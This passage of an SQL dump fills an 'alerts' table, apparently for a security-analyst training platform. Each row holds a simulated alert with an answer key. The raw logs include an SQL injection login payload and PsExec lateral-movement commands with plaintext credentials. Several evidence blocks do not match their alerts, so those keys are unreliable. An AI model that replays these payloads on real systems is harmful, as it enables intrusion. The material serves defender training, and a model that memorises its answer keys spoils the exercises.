/login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:20:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.328Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:20:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.328Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:20:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.328Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:20:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' 
--\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.328Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:20:10Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"guest\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(679, 'Unauthorized Access Attempt via PSExec', 'critical', 'EDR', 'Detected unauthorized use of PSExec for lateral movement within the network, indicating a potential compromise of administrative credentials.', 'Lateral Movement', 'T1569', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T14:10:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.20.15\",\"dst_ip\":\"192.168.20.20\",\"username\":\"administrator\",\"hostname\":\"server-01\",\"command_line\":\"psexec \\\\\\\\192.168.20.20 -u administrator -p secret cmd.exe\"}', '2026-01-10 04:57:21', '2026-02-16 18:05:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.20.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP of unauthorized PSExec execution\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.20.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP targeted for lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.20.20 -u administrator -p secret cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"PSExec command used for unauthorized access\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec with administrative credentials suggests lateral movement within the network.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(680, 'Innocuous User Activity Mistaken for Attack', 'low', 'SIEM', 'A legitimate user activity was flagged as suspicious due to unusual but authorized access patterns.', 'Credential Attack', 'T1078', 0, 'Closed', 210, '{\"timestamp\":\"2026-01-11T15:00:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.168.30.5\",\"dst_ip\":\"192.168.30.10\",\"username\":\"jane.doe\",\"hostname\":\"desktop-01\",\"request_body\":\"\"}', '2026-01-09 22:30:49', '2026-02-26 22:00:13', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.30.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Legitimate internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jane.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Management System\",\"verdict\":\"clean\",\"details\":\"Authorized user with legitimate access\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity was flagged due to unusual login patterns but was found to be legitimate upon review.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.330Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:00:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.30.5\\\",\\\"dst_ip\\\":\\\"192.168.30.10\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"desktop-01\\\",\\\"request_body\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.330Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:00:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.30.5\\\",\\\"dst_ip\\\":\\\"192.168.30.10\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"desktop-01\\\",\\\"request_body\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.330Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:00:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.30.5\\\",\\\"dst_ip\\\":\\\"192.168.30.10\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"desktop-01\\\",\\\"request_body\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.330Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:00:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.30.5\\\",\\\"dst_ip\\\":\\\"192.168.30.10\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"desktop-01\\\",\\\"request_body\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.330Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:00:00Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.30.5\\\",\\\"dst_ip\\\":\\\"192.168.30.10\\\",\\\"username\\\":\\\"jane.doe\\\",\\\"hostname\\\":\\\"desktop-01\\\",\\\"request_body\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(681, 'Phishing Email Detected with Clean URL', 'medium', 'Email Gateway', 'A phishing email was detected; however, the URL was verified as clean after further analysis.', 'Phishing', 'T1566', 0, 'Closed', 225, '{\"timestamp\":\"2026-01-11T09:40:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.0.2.10\",\"dst_ip\":\"192.168.5.10\",\"username\":\"mjohnson\",\"hostname\":\"mail-server\",\"email_sender\":\"info@securemail.com\",\"url\":\"http://legitimate-site.com\"}', '2026-01-10 17:07:54', '2026-03-09 23:40:49', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"info@securemail.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email address associated with previous phishing attempts\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://legitimate-site.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL verified as legitimate\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email was initially flagged due to the sender\'s history, but the URL was found to be legitimate.\"}', 'Expert', 'NDR', 9, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected with Clean URL\",\"date\":\"2026-02-01T20:32:22.331Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(682, 'DNS Query to Benign Domain Mistaken for DGA', 'low', 'Firewall', 'A DNS query was flagged for potential DGA activity, but the domain was verified as part of legitimate testing activity.', 'Malware', 'T1568', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.40.5\",\"dst_ip\":\"192.168.40.5\",\"username\":\"qauser\",\"hostname\":\"test-machine\",\"domain\":\"test-domain-1234.com\"}', '2026-01-11 07:40:24', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"test-domain-1234.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Domain used for internal testing purposes\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.40.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"IP address of a test machine\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The domain was mistaken for a DGA domain but is used for legitimate testing.\"}', 'Expert', 'MAL', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(683, 'LockBit 3.0 Ransomware Detected via Cobalt Strike Beacon', 'critical', 'CrowdStrike', 'A Cobalt Strike Beacon associated with LockBit 3.0 ransomware was detected communicating with a known malicious IP. Indicators show initial access was achieved via compromised RDP credentials.', 'Malware', 'T1071', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T08:45:21Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"CORP-SERVER01\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\",\"file_hash\":\"3c8a3f7d8f9f4b3a4e8d7c9b5e9f2d1f\"}', '2026-01-10 04:57:56', '2026-02-16 18:05:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activities associated with ransomware\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3c8a3f7d8f9f4b3a4e8d7c9b5e9f2d1f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a Cobalt Strike payload\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised machine\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Cobalt Strike beacon activity detected from internal server communicating with known ransomware-associated IP.\"}', 'Expert', 'EDR', 9, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(684, 'Suspicious Email Detected - Potential Phishing', 'high', 'Proofpoint', 'An email purporting to be from a trusted source contained a link to a known phishing domain. The email was flagged due to domain spoofing and suspicious attachments.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:30:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.25\",\"username\":\"asanchez\",\"hostname\":\"USER-LAPTOP02\",\"email_sender\":\"no-reply@trustedsource.com\",\"url\":\"http://phishing-link.example.com\"}', '2026-01-10 12:47:27', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"no-reply@trustedsource.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain does not match known trusted sources\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://phishing-link.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain targeting financial credentials\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 120 times for sending phishing emails\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Email contained a link to a known phishing domain and originated from a suspicious IP.\"}', 'Expert', 'NDR', 9, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Detected - Potential Phishing\",\"date\":\"2026-02-01T20:32:22.333Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(685, 'False Positive: Unusual Network Scanning Activity', 'medium', 'Wazuh', 'A network scanning tool was detected running on an internal server. Analysis revealed it was part of a scheduled vulnerability assessment.', 'Network Activity', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:15:33Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.30\",\"dst_ip\":\"10.0.0.50\",\"username\":\"admin\",\"hostname\":\"INTERNAL-SCAN01\",\"command_line\":\"nmap -sV 10.0.0.50\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-11 12:38:44', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"nmap -sV 10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command execution aligns with scheduled vulnerability scanning\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of authorized scanner\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of scanned server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_activity\",\"analysis_notes\":\"The activity corresponds to an authorized vulnerability scan and is not malicious.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.334Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:15:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SCAN01\\\",\\\"command_line\\\":\\\"nmap -sV 10.0.0.50\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.334Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:15:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SCAN01\\\",\\\"command_line\\\":\\\"nmap -sV 10.0.0.50\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.334Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:15:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SCAN01\\\",\\\"command_line\\\":\\\"nmap -sV 10.0.0.50\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.334Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:15:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SCAN01\\\",\\\"command_line\\\":\\\"nmap -sV 10.0.0.50\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.334Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T07:15:33Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.30\\\",\\\"dst_ip\\\":\\\"10.0.0.50\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SCAN01\\\",\\\"command_line\\\":\\\"nmap -sV 10.0.0.50\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(686, 'BlackCat/ALPHV Ransomware Pre-Encryption Reconnaissance Detected', 'critical', 'Splunk', 'Pre-encryption reconnaissance activities linked to the BlackCat/ALPHV ransomware group were detected. Attackers used PsExec for lateral movement within the network.', 'Lateral Movement', 'T1047', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T10:05:10Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.45\",\"username\":\"administrator\",\"hostname\":\"CORP-SERVER01\",\"command_line\":\"PsExec.exe \\\\\\\\10.0.0.45 -u administrator -p password cmd.exe\"}', '2026-01-10 02:32:48', '2026-02-16 18:05:20', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"PsExec.exe \\\\\\\\10.0.0.45 -u administrator -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"PsExec usage consistent with lateral movement by ransomware groups\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised machine\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target machine\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PsExec detected being used for lateral movement indicative of ransomware pre-encryption reconnaissance.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.335Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\10.0.0.45 -u administrator -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.335Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\10.0.0.45 -u administrator -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.335Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\10.0.0.45 -u administrator -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.335Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:05:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.45\\\",\\\"username\\\":\\\"administrator\\\",\\\"hostname\\\":\\\"CORP-SERVER01\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\10.0.0.45 -u 
